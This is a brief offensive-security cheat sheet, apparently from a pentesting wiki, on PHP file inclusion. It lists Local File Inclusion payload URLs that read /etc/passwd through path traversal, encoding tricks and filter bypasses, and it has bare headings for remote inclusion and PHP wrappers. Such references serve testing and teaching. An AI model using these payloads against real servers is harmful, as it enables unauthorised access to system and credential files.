File Inclusion
File inclusion
Local File Inclusion (LFI)
Basic LFI and bypasses
http://domain.com/index.php?page=../../../etc/passwdURL encoding
http://domain.com/index.php?page=..%252f..%252f..%252fetc%252fpasswd
http://domain.com/index.php?page=..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
http://domain.com/index.php?page=%252e%252e%252fetc%252fpasswd
http://domain.com/index.php?page=%252e%252e%252fetc%252fpasswd%00Filter bypasses
http://domain.com/index.php?page=....//....//etc/passwd
http://domain.com/index.php?page=..///////..////..//////etc/passwd
http://domain.com/index.php?page=PhP://filterRemote File Inclusion (RFI)
Basic RFI and bypasses
PHP wrappers
php://filter
data://
phar:// and phar deserialisation
Exploitation
References
Last updated